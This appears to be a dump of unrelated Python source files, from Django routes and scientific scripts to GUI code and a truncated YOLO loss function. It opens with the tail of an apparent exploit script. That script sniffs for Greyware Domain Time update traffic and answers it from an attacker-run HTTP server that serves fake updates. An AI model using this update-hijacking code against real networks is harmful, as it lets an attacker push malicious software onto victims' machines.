# This points to a URL on our server, not theirs
update_url = f'http://{server_ip}{port_string}/software/domaintime/update/evaluation.asp'
#update_url = f'http://{server_ip}{port_string}/software/domaintime/update/registered.asp'
# The typical update domains (DT2 update domain and web domain)
update_domains = ['update.greyware.com', 'www.greyware.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# listen on 9909:UDP so we don't respond that the port is closed
udp_child = Process(target=recv_udp, args=(server_ip,))
udp_child.start()
sleep(0.1)
if not udp_child.is_alive():
print('Warning: failed to listen on port 9909:UDP; may not respond correctly')
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print(f'Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
udp_child.terminate()
udp_child.join()
print('Done.')
|
from django.urls import path
from .views import create_product_view, product_detail_view, edit_product_view
urlpatterns = [
path('add_product', create_product_view, name='add_product'),
path('product/<str:pk>/', product_detail_view, name='product_detail'),
path('product/<str:pk>/edit', edit_product_view, name='edit_product'),
]
|
import requests
from joblib import Parallel, delayed
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from .config import DATASET, SRC_FILES, n_jobs
from .data_reader import ManySStuBs4J
def download_file(session, url, save_path):
if not save_path.exists() or save_path.stat().st_size == 0:
try:
with session.get(url) as r:
r.raise_for_status()
save_path.parent.mkdir(parents=True, exist_ok=True)
with open(save_path, 'wb') as file:
file.write(r.content)
except Exception as e:
with open('error_log.txt', 'a') as logf:
logf.write(f'{e}, {url}\n')
def main():
manysstub = ManySStuBs4J(DATASET)
download_params = []
for bug in manysstub.bugs:
# Downloading file with parent hash
download_params.append(
(bug.file_url_parent_hash,
SRC_FILES / bug.buggy_file_dir / bug.file_name)
)
# Downloading file with fix hash
download_params.append(
(bug.file_url_fix_hash,
SRC_FILES / bug.fixed_file_dir / bug.file_name)
)
with requests.Session() as session:
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[500, 502, 503, 504])
session.mount('https://', HTTPAdapter(max_retries=retries))
Parallel(n_jobs=n_jobs)(delayed(download_file)(session, url, save_path)
for url, save_path in download_params)
if __name__ == '__main__':
main()
|
# This file is part of the pyMOR project (https://www.pymor.org).
# Copyright 2013-2021 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (https://opensource.org/licenses/BSD-2-Clause)
from pymortests.base import runmodule
from pymortests.pickling import assert_picklable, assert_picklable_without_dumps_function
def test_pickle(analytical_problem):
assert_picklable(analytical_problem)
def test_pickle_without_dumps_function(picklable_analytical_problem):
assert_picklable_without_dumps_function(picklable_analytical_problem)
if __name__ == "__main__":
runmodule(filename=__file__)
|
# coding: utf-8
# In[1]:
from song import measure_xdrift
# In[2]:
dp = '/hydrogen/song/star_spec/20161206/night/raw/'
# In[3]:
t = measure_xdrift.scan_files(dp)
# In[4]:
t2, fig = measure_xdrift.check_xdrift(t)
# In[5]:
fig
# In[6]:
fig.savefig('/hydrogen/song/figs/Xdrift_20161206.svg')
# In[7]:
t.write('/hydrogen/song/figs/file_catalog_20161206.fits')
|
from __future__ import division, print_function
import time
from tfmini_library import TFmini
# create the sensor and give it a port and (optional) operating mode
tf = TFmini('/dev/ttyS0', mode=TFmini.STD_MODE)
#f=open("lidarDump.txt",a)
print('init done');
try:
print('='*25)
while True:
d = tf.read()
if d:
#f.write('Distance: {:5}, Strength: {:5}'.format(d[0],d[1]))
print('Distance: {:5}, Strength: {:5}'.format(d[0], d[1]))
else:
print('No valid response')
time.sleep(0.1)
except KeyboardInterrupt:
tf.close()
f.close()
print('bye!!')
|
# vim: sw=4:ts=4:et
#
# ACE proxy settings
import urllib.parse
import saq
def proxies():
"""Returns the current proxy settings pulled from the configuration.
Returns a dict in the following format. ::
{
'http': 'url',
'https': 'url'
}
"""
# set up the PROXY global dict (to be used with the requests library)
result = {}
for proxy_key in [ 'http', 'https' ]:
if saq.CONFIG['proxy']['host'] and saq.CONFIG['proxy']['port'] and saq.CONFIG['proxy']['transport']:
if saq.CONFIG['proxy']['user'] and saq.CONFIG['proxy']['password']:
result[proxy_key] = '{}://{}:{}@{}:{}'.format(
saq.CONFIG['proxy']['transport'],
urllib.parse.quote_plus(saq.CONFIG['proxy']['user']),
urllib.parse.quote_plus(saq.CONFIG['proxy']['password']),
saq.CONFIG['proxy']['host'],
saq.CONFIG['proxy']['port'])
else:
result[proxy_key] = '{}://{}:{}'.format(saq.CONFIG['proxy']['transport'],
saq.CONFIG['proxy']['host'],
saq.CONFIG['proxy']['port'])
return result
|
from .alphabet import Alphabet
from .beam_search import BeamSearcher
from .language_model import LanguageModel
|
from urllib.parse import urlencode
from seafileapi.utils import utf8lize
from seafileapi.files import SeafDir, SeafFile
from seafileapi.utils import raise_does_not_exist
class Repo(object):
"""
A seafile library
"""
def __init__(self, client, repo_id, repo_name,
encrypted, owner, perm):
self.client = client
self.id = repo_id
self.name = repo_name
self.encrypted = encrypted
self.owner = owner
self.perm = perm
@classmethod
def from_json(cls, client, repo_json):
repo_json = utf8lize(repo_json)
repo_id = repo_json['id']
repo_name = repo_json['name']
encrypted = repo_json['encrypted']
perm = repo_json['permission']
owner = repo_json['owner']
return cls(client, repo_id, repo_name, encrypted, owner, perm)
def is_readonly(self):
return 'w' not in self.perm
@raise_does_not_exist('The requested file does not exist')
def get_file(self, path):
"""Get the file object located in `path` in this repo.
Return a :class:`SeafFile` object
"""
assert path.startswith('/')
url = '/api2/repos/%s/file/detail/' % self.id
query = '?' + urlencode(dict(p=path))
file_json = self.client.get(url + query).json()
return SeafFile(self, path, file_json['id'], file_json['size'])
@raise_does_not_exist('The requested dir does not exist')
def get_dir(self, path):
"""Get the dir object located in `path` in this repo.
Return a :class:`SeafDir` object
"""
assert path.startswith('/')
url = '/api2/repos/%s/dir/' % self.id
query = '?' + urlencode(dict(p=path))
resp = self.client.get(url + query)
dir_id = resp.headers['oid']
dir_json = resp.json()
dir = SeafDir(self, path, dir_id)
dir.load_entries(dir_json)
return dir
def delete(self):
"""Remove this repo. Only the repo owner can do this"""
self.client.delete('/api2/repos/' + self.id)
def list_history(self):
"""List the history of this repo
Returns a list of :class:`RepoRevision` object.
"""
pass
## Operations only the repo owner can do:
def update(self, name=None):
"""Update the name of this repo. Only the repo owner can do
this.
"""
pass
def get_settings(self):
"""Get the settings of this repo. Returns a dict containing the following
keys:
`history_limit`: How many days of repo history to keep.
"""
pass
def restore(self, commit_id):
pass
class RepoRevision(object):
def __init__(self, client, repo, commit_id):
self.client = client
self.repo = repo
self.commit_id = commit_id
def restore(self):
"""Restore the repo to this revision"""
self.repo.revert(self.commit_id)
|
import addict
from act.scio.plugins import threatactor_pattern
import os
import pytest
@pytest.mark.asyncio
async def test_threatactor_pattern() -> None:
""" test for plugins """
nlpdata = addict.Dict()
nlpdata.content = '''Lorem Ipsum Dirty Panda, APT1 APT-2, Apt 35, APT_46'''
plugin = threatactor_pattern.Plugin()
plugin.configdir = os.path.join(os.path.dirname(__file__), "../act/scio/etc/plugins")
res = await plugin.analyze(nlpdata)
assert 'Dirty Panda' in res.result.ThreatActors
assert 'APT 1' in res.result.ThreatActors
assert 'APT 2' in res.result.ThreatActors
assert 'APT 35' in res.result.ThreatActors
assert 'APT 46' in res.result.ThreatActors
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
class DocumentDBTests(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_cosmosdb_account')
def test_create_database_account(self, resource_group):
self.kwargs.update({
'acc': self.create_random_name(prefix='cli', length=40)
})
self.cmd('az cosmosdb create -n {acc} -g {rg} --enable-automatic-failover --default-consistency-level ConsistentPrefix')
self.cmd('az cosmosdb show -n {acc} -g {rg}', checks=[
self.check('enableAutomaticFailover', True),
self.check('consistencyPolicy.defaultConsistencyLevel', 'ConsistentPrefix'),
])
self.cmd('az cosmosdb update -n {acc} -g {rg} --enable-automatic-failover false --default-consistency-level Session')
self.cmd('az cosmosdb show -n {acc} -g {rg}', checks=[
self.check('enableAutomaticFailover', False),
self.check('consistencyPolicy.defaultConsistencyLevel', 'Session')
])
|
import subprocess
import time
import argparse
proc = None
moving = True
def arg_conv(str):
if str.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif str.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Please enter a boolean value like true or false!')
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--picamera", type=arg_conv, default=False,
help="whether or not the Raspberry Pi camera should be used")
args = vars(ap.parse_args())
isRaspberryPi = 1 if args['picamera'] else 0
while moving:
if moving and proc is None:
proc = subprocess.Popen(['python3', 'detection.py', '-p', str(isRaspberryPi)])
time.sleep(20) # remove this line -- used for debugging
moving = False
elif not moving and not proc is None:
proc.terminate()
proc = None
moving = False
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Main file of Altai. Execute it to use the application. """
# System imports
import sys
from os.path import expanduser
import PySide2.QtGui as QtGui
import PySide2.QtCore as QtCore
import PySide2.QtWidgets as QtWidgets
# Altai imports
from . import config
from .vented_box_frame import VentedBoxFrame
from .vent_dimensions_frame import VentDimensionsFrame
from .driver_db_frame import DriverDatabaseFrame
class Gui(QtWidgets.QMainWindow):
""" Gui class for the main window. """
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
self.setWindowTitle("Altai")
self.create_menu()
self.tab_bar = QtWidgets.QTabBar()
self.tab_bar.addTab("Vented Box Response")
self.tab_bar.addTab("Vent Dimensions")
self.tab_bar.addTab("Driver Database")
self.tab_bar.currentChanged.connect(self.change_main_tab)
vented_box_frame = VentedBoxFrame()
vent_dimensions_frame = VentDimensionsFrame()
driver_database_frame = DriverDatabaseFrame()
driver_database_frame.new_manufacturer_added.connect(
vented_box_frame.driver_selection.update_drivers)
driver_database_frame.new_manufacturer_added.connect(
vent_dimensions_frame.driver_selection.update_drivers)
self.main_frames = [vented_box_frame, vent_dimensions_frame,
driver_database_frame]
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.tab_bar)
for i, frame in enumerate(self.main_frames):
vbox.addWidget(frame)
if i > 0:
frame.hide()
self.main_frame = QtWidgets.QWidget()
self.main_frame.setLayout(vbox)
self.setCentralWidget(self.main_frame)
def change_main_tab(self, tab_index):
""" Switch between main tab views. """
for i, frame in enumerate(self.main_frames):
if tab_index == i:
frame.show()
else:
frame.hide()
def create_menu(self):
""" Create main menu """
menu_file = self.menuBar().addMenu("&File")
menu_help = self.menuBar().addMenu("&Help")
# Save Figure
act_save = QtWidgets.QAction(self)
act_save.setText("Save Response as...")
act_save.setIcon(QtGui.QIcon.fromTheme('document-save-as'))
menu_file.addAction(act_save)
act_save.triggered.connect(self.save_figure)
# Exit button
act_exit = QtWidgets.QAction(self)
act_exit.setText("Exit")
act_exit.setIcon(QtGui.QIcon.fromTheme('application-exit'))
menu_file.addAction(act_exit)
act_exit.triggered.connect(self.close)
# About window
act_about = QtWidgets.QAction(self)
act_about.setText("About")
act_about.setIcon(QtGui.QIcon.fromTheme('help-about'))
menu_help.addAction(act_about)
act_about.triggered.connect(self.create_about_window)
def save_figure(self):
""" Save figure as file; all filetypes that are supported by matplotlib"""
home = expanduser("~")
fname, _ = QtWidgets.QFileDialog.getSaveFileName(
self, "Save Response as", home,
"PDF, PNG and SVG (*.pdf *.png *.svg)")
self.main_frames[0].fig.savefig(fname)
def create_about_window(self):
""" Creates the about window for Altai. """
about = ("Altai is a cross-platform application for simulating audio "
"systems. With it, you can design speakers, find the optimum "
"driver, predict the frequency response, etc. It is still in "
"a very early stage of development. You can follow its "
"progress on github: <a href='http://github.com/Psirus/altai'>"
"Altai on GitHub</a>. Please report any issues and feature "
"ideas you may have.")
reply = QtWidgets.QMessageBox(self)
reply.setWindowTitle("About Altai")
reply.setTextFormat(QtCore.Qt.TextFormat.RichText)
reply.setText(about)
reply.exec_()
def main():
""" Main function; acts as entry point for Altai. """
app = QtWidgets.QApplication(sys.argv)
gui = Gui()
gui.resize(800, 600)
gui.show()
sys.exit(app.exec_())
|
import numpy as np
import pandas
import random
import re
import sys
from scipy.stats import pearsonr, spearmanr
# ausiliary functions
def buildSeriesByCategory(df, categories):
res = []
for cat in categories:
occ = df.loc[df["category"] == cat].shape[0]
res.append(occ)
res_series = pandas.Series(res, index=categories)
return res_series
def fillList(series):
list = []
for label, value in series.items():
if label != "reacted":
num = value
while num > 0:
list.append(label)
num = num - 1
return pandas.Series(list)
def printStatsByCategory(df, categories):
for cat in categories:
occ = df.loc[df["category"] == cat].shape[0]
print(cat + ": " + str(occ))
def buildOverallResultSeries(resulting_series):
res_list = []
for label, serie in resulting_series.items():
sum = 0;
for value in serie:
sum += value
res_list.append(sum)
return res_list
def fillTwoLists(typ, cat, labels_string, cat_list, label_list):
labels = labels_string.split(",")
for label in labels:
if label != 'nan':
cat_list.append(cat)
label_list.append(typ + ":" + label.strip())
def printOccurrences(antipatterns, tot_smells, tot_ana_projects, tot_ana_owners):
num_smells = antipatterns['ID'].shape[0]
percentage_num_smells = round(num_smells / tot_smells * 100, 1)
print("#smells: " + str(num_smells) + "(" + str(percentage_num_smells) + "%)")
num_smelly_projects = antipatterns['Project'].unique().shape[0]
percentage_num_smelly_projects = round(num_smelly_projects / tot_ana_projects * 100, 1)
print("#smelly-projects: " + str(num_smelly_projects) + "(" + str(percentage_num_smelly_projects) + "%)")
num_smelly_owners = antipatterns['Owner'].unique().shape[0]
percentage_num_smelly_owners = round(num_smelly_owners / tot_ana_owners * 100, 1)
print("#smelly-owners: " + str(num_smelly_owners) + "(" + str(percentage_num_smelly_owners) + "%)")
def printOccurrencesPerCluster(apdf, tot_smells, tot_ana_projects, tot_ana_owners, tot_ana_projects_versioning,
tot_ana_owners_versioning):
print("\n-> Versioning")
versioning = apdf.loc[apdf["Category"] == "Versioning"]
printOccurrences(versioning, tot_smells, tot_ana_projects_versioning, tot_ana_owners_versioning)
print("\n-> Job-Allow-Failure")
allow_failure = apdf.loc[apdf["Category"] == "Job-Allow-Failure"]
printOccurrences(allow_failure, tot_smells, tot_ana_projects, tot_ana_owners)
print("\n-> Job-Retry")
retry = apdf.loc[apdf["Category"] == "Job-Retry"]
printOccurrences(retry, tot_smells, tot_ana_projects, tot_ana_owners)
print("\n-> Manual-Job")
manual = apdf.loc[apdf["Category"] == "Manual-Job"]
printOccurrences(manual, tot_smells, tot_ana_projects, tot_ana_owners)
def printOccurrences2(df, tot):
num_smells = df['ID'].shape[0]
percentage_num_smells = round(num_smells / tot * 100, 1)
print("#smells: " + str(num_smells) + "(" + str(percentage_num_smells) + "%)")
def printOccurrencesPerCluster2(apdf, tot_versioning, tot_allow, tot_retry, tot_manual):
print("-> Versioning")
versioning = apdf.loc[apdf["Category"] == "Versioning"]
printOccurrences2(versioning, tot_versioning)
print("-> Job-Allow-Failure")
allow_failure = apdf.loc[apdf["Category"] == "Job-Allow-Failure"]
printOccurrences2(allow_failure, tot_allow)
print("-> Job-Retry")
retry = apdf.loc[apdf["Category"] == "Job-Retry"]
printOccurrences2(retry, tot_retry)
print("-> Manual-Job")
manual = apdf.loc[apdf["Category"] == "Manual-Job"]
printOccurrences2(manual, tot_manual)
# RQ3 data analysis
def rqthree_results(input_file, dataset):
datasetf = pandas.read_csv(dataset)
datasetf = datasetf.loc[datasetf["hasYaml"]] # remove projects without yaml
print("Analyzable projects: " + str(datasetf.shape[0]))
print("\n### Describe dataset ###")
summary = datasetf['yml_size'].describe()
tot_projects = datasetf["project"].unique().shape[0]
tot_owners = datasetf["owner"].unique().shape[0]
print("Analyzable repositories: " + str(tot_projects))
# for versioning different candidates
versioning_candidates = datasetf.loc[(datasetf["language"] == "Python") | (datasetf["hasPoms"])]
tot_projects_versioning = versioning_candidates["project"].unique().shape[0]
tot_owners_versioning = versioning_candidates["owner"].unique().shape[0]
print("Analyzable repositories (Versioning): " + str(tot_projects_versioning))
print("Analyzable owners: " + str(tot_owners))
print("Analyzable owners (Versioning): " + str(tot_owners_versioning))
yml_first_quartile = summary["25%"]
print("YML-size (25%): " + str(yml_first_quartile))
yml_third_quartile = summary["75%"]
print("YML-size (75%): " + str(yml_third_quartile))
# Merge antipatterns with dataset
antipatterns = pandas.read_csv(input_file)
apdf = pandas.merge(antipatterns, datasetf, left_on='Repository Name', right_on='project', how='left')
# exclude additional python projects without yaml
apdf = apdf.loc[pandas.notna(apdf["project"])]
print("\n### Full-analysis of smells ###")
print("-> Overall")
tot_smells = apdf['ID'].shape[0]
tot_smelly_projects = apdf['Project'].unique().shape[0]
tot_smelly_owners = apdf['owner'].unique().shape[0]
print("#smells: " + str(tot_smells))
print("#smelly-projects: " + str(tot_smelly_projects))
print("#smelly-owners: " + str(tot_smelly_owners))
printOccurrencesPerCluster(apdf, tot_smells, tot_projects, tot_owners, tot_projects_versioning,
tot_owners_versioning)
print("\n### YAML-size-based clustering analysis ###")
tot_versioning = apdf.loc[apdf["Category"] == "Versioning"].shape[0]
tot_allow = apdf.loc[apdf["Category"] == "Job-Allow-Failure"].shape[0]
tot_manual = apdf.loc[apdf["Category"] == "Manual-Job"].shape[0]
tot_retry = apdf.loc[apdf["Category"] == "Job-Retry"].shape[0]
print("\n-> Projects (small yaml)")
apdf_small = apdf.loc[apdf["yml_size"] <= yml_first_quartile]
printOccurrences(apdf_small, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_small, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n-> Projects (medium yaml)")
apdf_medium = apdf.loc[(apdf["yml_size"] > yml_first_quartile) & (apdf["yml_size"] < yml_third_quartile)]
printOccurrences(apdf_medium, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_medium, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n-> Projects (long yaml)")
apdf_big = apdf.loc[apdf["yml_size"] >= yml_third_quartile]
printOccurrences(apdf_big, tot_smells, tot_smelly_projects, tot_smelly_owners)
printOccurrencesPerCluster2(apdf_big, tot_versioning, tot_allow, tot_retry, tot_manual)
print("\n### YAML-size-based clustering analysis (Big YAML) ###")
# reduce starting dataset to the high sample
big_datasetf = datasetf.loc[datasetf["yml_size"] >= yml_third_quartile]
big_tot_projects = big_datasetf["project"].unique().shape[0]
big_tot_owners = big_datasetf["owner"].unique().shape[0]
print("Analyzable repositories: " + str(big_tot_projects))
# for versioning different candidates
big_versioning_candidates = big_datasetf.loc[(big_datasetf["language"] == "Python") | (big_datasetf["hasPoms"])]
big_tot_projects_versioning = big_versioning_candidates["project"].unique().shape[0]
big_tot_owners_versioning = big_versioning_candidates["owner"].unique().shape[0]
print("Analyzable repositories (Versioning): " + str(big_tot_projects_versioning))
print("Analyzable owners: " + str(big_tot_owners))
print("Analyzable owners (Versioning): " + str(big_tot_owners_versioning))
big_tot_smells = apdf_big['ID'].shape[0]
big_tot_smelly_projects = apdf_big['Project'].unique().shape[0]
big_tot_smelly_owners = apdf_big['Owner'].unique().shape[0]
print("#smells: " + str(big_tot_smells))
print("#smelly-projects: " + str(big_tot_smelly_projects))
print("#smelly-owners: " + str(big_tot_smelly_owners))
printOccurrencesPerCluster(apdf_big, big_tot_smells, big_tot_projects, big_tot_owners, big_tot_projects_versioning,
big_tot_owners_versioning)
print("\n# Analysis of versioning issues")
vapdf = apdf.loc[apdf["Category"] == "Versioning"] # the versioning frame
# tot incidents per file
print("\n-> overall")
versioning_occurrences_byfile(vapdf)
print("\n-> missing")
missing = vapdf.loc[vapdf["Sub-Category"] == "missing"]
versioning_occurrences_byfile(missing)
print("\n-> only-major-number")
only_major_number = vapdf.loc[vapdf["Sub-Category"] == "only-major-number"]
versioning_occurrences_byfile(only_major_number)
print("\n-> any-minor-number")
any_minor_number = vapdf.loc[vapdf["Sub-Category"] == "any-minor-number"]
versioning_occurrences_byfile(any_minor_number)
print("\n-> any-upper-version")
any_upper_version = vapdf.loc[vapdf["Sub-Category"] == "any-upper-version"]
versioning_occurrences_byfile(any_upper_version)
return
def versioning_occurrences_byfile(smell):
tot_incidents = smell.shape[0]
affected_files = smell["Remote Configuration File Link"].unique().shape[0]
yml_incidents = smell.loc[smell["Configuration File Name"] == ".gitlab-ci.yml"]
tot_yml_incidents = yml_incidents.shape[0]
tot_affected_yml = yml_incidents["Remote Configuration File Link"].unique().shape[0]
req_incidents = smell.loc[smell["Configuration File Name"] == "requirements.txt"]
tot_req_incidents = req_incidents.shape[0]
tot_affected_req = req_incidents["Remote Configuration File Link"].unique().shape[0]
pom_incidents = smell.loc[(smell["Configuration File Name"] != ".gitlab-ci.yml") &
(smell["Configuration File Name"] != "requirements.txt")]
tot_pom_incidents = pom_incidents.shape[0]
tot_affected_pom = pom_incidents["Remote Configuration File Link"].unique().shape[0]
print("tot_incidents: " + str(tot_incidents))
print("affected_files: " + str(affected_files))
print("tot_yml_incidents: " + str(tot_yml_incidents) + "(" + str(
round(tot_yml_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_yml_files: " + str(tot_affected_yml))
print("tot_req_incidents: " + str(tot_req_incidents) + "(" + str(
round(tot_req_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_req_files: " + str(tot_affected_req))
print("tot_pom_incidents: " + str(tot_pom_incidents) + "(" + str(
round(tot_pom_incidents / tot_incidents * 100, 2)) + "%)")
print("affected_pom_files: " + str(tot_affected_pom))
if __name__ == '__main__':
print("\nRQ3 results")
dataset_withyml = sys.argv[1] # "dataset_yml-update.csv"
rqthree_smells = sys.argv[2] # "rq3-results-new.csv"
rqthree_results(rqthree_smells, dataset_withyml)
|
from .expander import Expander # noqa
from .bundler import Bundler, create_scanner_factory_from_flavor # noqa
from .separator import Separator # noqa
from .resolver import ( # noqa
get_resolver,
get_resolver_from_filename, # backward compatibility
)
from .example import extract as extract_example # noqa
from .accessor import ( # noqa
access_by_json_pointer,
assign_by_json_pointer,
path_to_json_pointer,
json_pointer_to_path,
)
from ..langhelpers import make_dict, pairrsplit
import os.path
def expand(filename, *, onload=None, doc=None, format=None):
resolver = get_resolver(filename, doc=doc, onload=onload, format=format)
expander = Expander(resolver)
return expander.expand()
def bundle(
filename, *, onload=None, doc=None, format=None, extras=None, flavor="openapiv2"
):
jsonref = ""
if filename:
filename, jsonref = pairrsplit(filename, "#/")
if jsonref:
doc = make_dict()
cwd = os.getcwd()
ref = "{prefix}#/{jsonref}".format(
prefix=os.path.relpath(filename, start=cwd), jsonref=jsonref
)
assign_by_json_pointer(doc, jsonref, {"$ref": ref})
filename = os.path.join(
cwd, "*root*{name}#/".format(name=os.path.splitext(filename)[1])
)
# adding multi files
if extras is not None:
for efilename in extras:
efilename, ejsonref = pairrsplit(efilename, "#/")
if not ejsonref:
raise ValueError(
"{efilename!r} is not json reference. (please <filename>#/<reference>)"
)
eref = "{prefix}#/{ejsonref}".format(
prefix=os.path.relpath(efilename, start=cwd), ejsonref=ejsonref
)
assign_by_json_pointer(doc, ejsonref, {"$ref": eref})
resolver = get_resolver(filename, doc=doc, onload=onload, format=format)
bundler = Bundler(
resolver, scanner_factory=create_scanner_factory_from_flavor(flavor)
)
r = bundler.bundle(resolver.doc)
return r
def separate(src: str, *, dst: str = None, input_format=None, output_format=None):
resolver = get_resolver(src, format=input_format)
separator = Separator(resolver, format=output_format, here=dst or None)
separator.separate(name="main", dst=dst)
|
from pyacc.common import DFAState, DFA
class LALRDFAState(DFAState):
count = 0
class LALRDFA(DFA):
StateClass = LALRDFAState
def minimize(self):
pass
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: 通过元类控制实例的创建
Desc :
"""
class NoInstances(type):
def __call__(self, *args, **kwargs):
raise TypeError("Can't instantiate directly")
# Example
class Spam(metaclass=NoInstances):
@staticmethod
def grok(x):
print('Spam.grok')
class Singleton(type):
def __init__(self, *args, **kwargs):
self.__instance = None
super().__init__(*args, **kwargs)
def __call__(self, *args, **kwargs):
if self.__instance is None:
self.__instance = super().__call__(*args, **kwargs)
return self.__instance
else:
return self.__instance
# Example
class Spam1(metaclass=Singleton):
def __init__(self):
print('Creating Spam')
import weakref
class Cached(type):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__cache = weakref.WeakValueDictionary()
def __call__(self, *args):
if args in self.__cache:
return self.__cache[args]
else:
obj = super().__call__(*args)
self.__cache[args] = obj
return obj
# Example
class Spam2(metaclass=Cached):
def __init__(self, name):
print('Creating Spam({!r})'.format(name))
self.name = name
|
import re
import csv
#with open('My_Games', 'r') as in_file:
# stripped = (line.strip() for line in in_file)
# lines = (line.split("\n\n") for line in stripped if line)
# with open('my_games.csv', 'w') as out_file:
# writer = csv.writer(out_file)
# writer.writerow(('Event', 'Date', 'White', 'Black', 'Result', 'WhiteElo', 'BlackElo', 'Variant', 'TimeControl', 'First Move', 'Second Move'))
# writer.writerow(lines)
with open('My_Games', 'r') as input_file:
my_games=[line.rstrip('\n') for line in input_file]
#reader=csv.reader(input_file, delimiter='\n')
with open('my_games.csv', 'w') as output_file:
writer = csv.writer(output_file)
writer.writerow(('Event', 'Date', 'White', 'Black', 'Result', 'WhiteElo', 'BlackElo', 'Variant', 'TimeControl', 'First Move', 'Second Move'))
for row in my_games:
writer.writerow(row)
|
import numpy as np
import torch
class YoloLoss(torch.nn.Module):
def __init__(self):
super(YoloLoss, self).__init__()
def forward(self, outputs, samp_bndbxs, y_true, anchors, scalez, cell_grid, ep, no_obj_thresh):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def reshape_ypred(outputz):
# reshape outputs to separate anchor boxes
outputz = outputz.unsqueeze(4)
outputz = torch.chunk(outputz, 5, dim=3)
outputz = torch.cat(outputz, dim=4)
outputz = outputz.transpose(3, 4)
return outputz
def split_preds(outputz):
# split to get individual outputs
xypred = torch.sigmoid(outputz[..., 0:2])
whpred = outputz[..., 2:4]
cfpred = torch.sigmoid(outputz[..., 4])
clpred = torch.sigmoid(outputz[..., 5:])
clpred = clpred.squeeze()
return xypred, whpred, cfpred, clpred
def split_preds_multi(outputz):
# split to get individual outputs
xypred = torch.sigmoid(outputz[..., 0:2])
whpred = outputz[..., 2:4]
cfpred = torch.sigmoid(outputz[..., 4])
# clpred = torch.sigmoid(outputz[..., 5:])
clpred = torch.nn.functional.softmax(outputz[..., 5:], dim=4)
# clpred = clpred.squeeze()
return xypred, whpred, cfpred, clpred
def create_bndbx_masks(sampbndbxs):
# get mask of which areas are zero
wh_gt = sampbndbxs[:, :, 2]
wh_gt[wh_gt == float('inf')] = 0
bndbxsmask = torch.gt(wh_gt, 0.0001)
bndbxsmask4 = bndbxsmask.unsqueeze(2)
bndbxsmask2 = bndbxsmask.unsqueeze(1)
bndbxsmask2 = bndbxsmask2.unsqueeze(1)
bndbxsmask2 = bndbxsmask2.unsqueeze(1)
return bndbxsmask, bndbxsmask2, bndbxsmask4
# Convert truth for noones.
def get_true_wi(sampbndbxs, bndbxsmask4):
truexywi = sampbndbxs[..., 1:3]
truewhwi = sampbndbxs[..., 3:5]
zerosreplace = torch.zeros(truexywi.size())
zerosreplace = zerosreplace.to(device)
truexywi = torch.where(bndbxsmask4, truexywi, zerosreplace)
truewhwi = torch.where(bndbxsmask4, truewhwi, zerosreplace)
truexywi = truexywi.unsqueeze(1)
truexywi = truexywi.unsqueeze(1)
truexywi = truexywi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
truewhwi = truewhwi.unsqueeze(1)
return truexywi, truewhwi
def get_noones_mask(predxywi, predwhwi, truexywi, truewhwi, bndbxsmask, noobjthresh):
truewhhalf2 = torch.div(truewhwi, 2.0)
truemins2 = truexywi - truewhhalf2
truemaxes2 = torch.add(truexywi, truewhhalf2)
bndbxsmask2 = bndbxsmask.unsqueeze(5)
zerosreplace = torch.zeros(truemins2.size())
zerosreplace = zerosreplace.to(device)
truemins2 = torch.where(bndbxsmask2, truemins2, zerosreplace)
truemaxes2 = torch.where(bndbxsmask2, truemaxes2, zerosreplace)
predxywi = predxywi.unsqueeze(4)
predwhwi = predwhwi.unsqueeze(4)
predwhhalf2 = torch.div(predwhwi, 2.)
predmins2 = predxywi - predwhhalf2
predmaxes2 = torch.add(predxywi, predwhhalf2)
intersectmins2 = torch.max(predmins2, truemins2)
intersectmaxes2 = torch.min(predmaxes2, truemaxes2)
intersectwh2 = intersectmaxes2 - intersectmins2
zerosreplace2 = torch.zeros(intersectwh2.size())
zerosreplace2 = zerosreplace2.to(device)
intersectwh2 = torch.max(intersectwh2, zerosreplace2)
intersectareas2 = torch.mul(intersectwh2[..., 0], intersectwh2[..., 1])
trueareas2 = torch.mul(truewhwi[..., 0], truewhwi[..., 1])
predareas2 = torch.mul(predwhwi[..., 0], predwhwi[..., 1])
unionareas2 = torch.add((torch.add(predareas2, trueareas2) - intersectareas2), 0.00001)
iouscoresall = torch.div(intersectareas2, unionareas2)
zerosreplace3 = torch.zeros(iouscoresall.size())
zerosreplace3 = zerosreplace3.to(device)
iouscoresall = torch.where(bndbxsmask, iouscoresall, zerosreplace3)
bestious = torch.max(iouscoresall, dim=4)
bestious = bestious.values
# print("best iou", round(torch.max(bestious).item(), 2))
# create masks ones and no ones
noones = torch.lt(bestious, noobjthresh)
return noones
def warm_select(epin, warmmat, truemat):
